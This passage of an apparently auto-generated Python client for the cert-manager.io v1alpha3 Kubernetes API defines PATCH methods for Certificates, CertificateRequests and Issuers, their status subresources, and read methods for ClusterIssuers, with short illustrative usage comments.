if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `patch_namespaced_certificate_request`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_namespaced_certificate_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/apply-patch+yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests/{name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateRequest', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_namespaced_certificate_request_status(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_certificate_request_status # noqa: E501
partially update status of the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_certificate_request_status(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_namespaced_certificate_request_status_with_http_info(name, namespace, body, **kwargs) # noqa: E501
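# Illustrative usage sketch (unusual outside of controllers or tests): status
# patches take effect only when the CRD exposes the status subresource, which
# cert-manager's CRDs generally do. The path below assumes a conditions list
# already exists on the object.
# >>> ops = [{'op': 'replace', 'path': '/status/conditions/0/message',
# ...         'value': 'cleared manually'}]
# >>> cr = api.patch_namespaced_certificate_request_status('my-cr', 'default', ops)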
def patch_namespaced_certificate_request_status_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_certificate_request_status # noqa: E501
partially update status of the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_certificate_request_status_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateRequest, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_certificate_request_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `patch_namespaced_certificate_request_status`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `patch_namespaced_certificate_request_status`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_namespaced_certificate_request_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/apply-patch+yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests/{name}/status', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateRequest', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_namespaced_certificate_status(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_certificate_status # noqa: E501
partially update status of the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_certificate_status(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Certificate
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_namespaced_certificate_status_with_http_info(name, namespace, body, **kwargs) # noqa: E501
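# Illustrative usage sketch: _request_timeout takes either a single number
# (total timeout in seconds) or a (connect, read) tuple, forwarded to urllib3.
# >>> cert = api.patch_namespaced_certificate_status(
# ...     'tls-cert', 'default', ops, _request_timeout=(3.05, 27))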
def patch_namespaced_certificate_status_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_certificate_status # noqa: E501
partially update status of the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_certificate_status_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Certificate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_certificate_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `patch_namespaced_certificate_status`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `patch_namespaced_certificate_status`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_namespaced_certificate_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/apply-patch+yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates/{name}/status', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Certificate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
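# Usage sketch (illustrative, not executed): partially updating a
# Certificate's status subresource. `api` is assumed to be an instance of
# this API class bound to a configured ApiClient; the names and the
# condition payload below are hypothetical. At the protocol level a JSON
# object body is a merge patch and a JSON array is a JSON patch; which
# Content-Type this generated client actually sends depends on its
# ApiClient implementation.
# >>> body = {"status": {"conditions": [{"type": "Ready", "status": "False"}]}}
# >>> cert = api.patch_namespaced_certificate_status("my-cert", "default", body)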
def patch_namespaced_issuer(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_issuer # noqa: E501
partially update the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_issuer(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be 128 characters or fewer and contain only printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Issuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_namespaced_issuer_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def patch_namespaced_issuer_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_issuer # noqa: E501
partially update the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_issuer_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be 128 characters or fewer and contain only printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: if True, return only the response data,
without the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Issuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `patch_namespaced_issuer`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `patch_namespaced_issuer`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_namespaced_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/apply-patch+yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers/{name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Issuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
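# Usage sketch (illustrative): the *_with_http_info variant returns a
# (data, status_code, headers) tuple instead of just the deserialized
# model. `api`, the Issuer name and the patch body are assumptions.
# >>> patch = [{"op": "replace", "path": "/spec/selfSigned", "value": {}}]
# >>> issuer, status, headers = api.patch_namespaced_issuer_with_http_info(
# ...     "my-issuer", "default", patch)
# >>> status  # 200 on success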
def patch_namespaced_issuer_status(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_issuer_status # noqa: E501
partially update status of the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_issuer_status(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be 128 characters or fewer and contain only printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Issuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_namespaced_issuer_status_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def patch_namespaced_issuer_status_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_issuer_status # noqa: E501
partially update status of the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_issuer_status_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be 128 characters or fewer and contain only printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: if True, return only the response data,
without the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Issuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_issuer_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `patch_namespaced_issuer_status`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `patch_namespaced_issuer_status`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_namespaced_issuer_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/apply-patch+yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers/{name}/status', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Issuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
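# Usage sketch (illustrative): dry_run="All" asks the API server to run
# all admission and validation stages for this status patch without
# persisting the result. Names and payload are hypothetical.
# >>> body = {"status": {"conditions": []}}
# >>> api.patch_namespaced_issuer_status("my-issuer", "default", body,
# ...                                    dry_run="All")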
def read_cluster_issuer(self, name, **kwargs): # noqa: E501
"""read_cluster_issuer # noqa: E501
read the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_cluster_issuer(name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3ClusterIssuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.read_cluster_issuer_with_http_info(name, **kwargs) # noqa: E501
def read_cluster_issuer_with_http_info(self, name, **kwargs): # noqa: E501
"""read_cluster_issuer # noqa: E501
read the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_cluster_issuer_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _return_http_data_only: if True, return only the response data,
without the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3ClusterIssuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'pretty',
'resource_version'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method read_cluster_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `read_cluster_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3ClusterIssuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
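# Usage sketch (illustrative): with _preload_content=False the raw
# urllib3.HTTPResponse is returned instead of a deserialized
# IoCertManagerV1alpha3ClusterIssuer, which is useful for streaming or
# custom decoding. `api` and the ClusterIssuer name are assumptions.
# >>> resp = api.read_cluster_issuer("letsencrypt-prod", _preload_content=False)
# >>> raw_body = resp.data  # undecoded response bytes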
def read_cluster_issuer_status(self, name, **kwargs): # noqa: E501
"""read_cluster_issuer_status # noqa: E501
read status of the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_cluster_issuer_status(name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3ClusterIssuer
If the method is called asynchronously,
returns the request thread.
"""
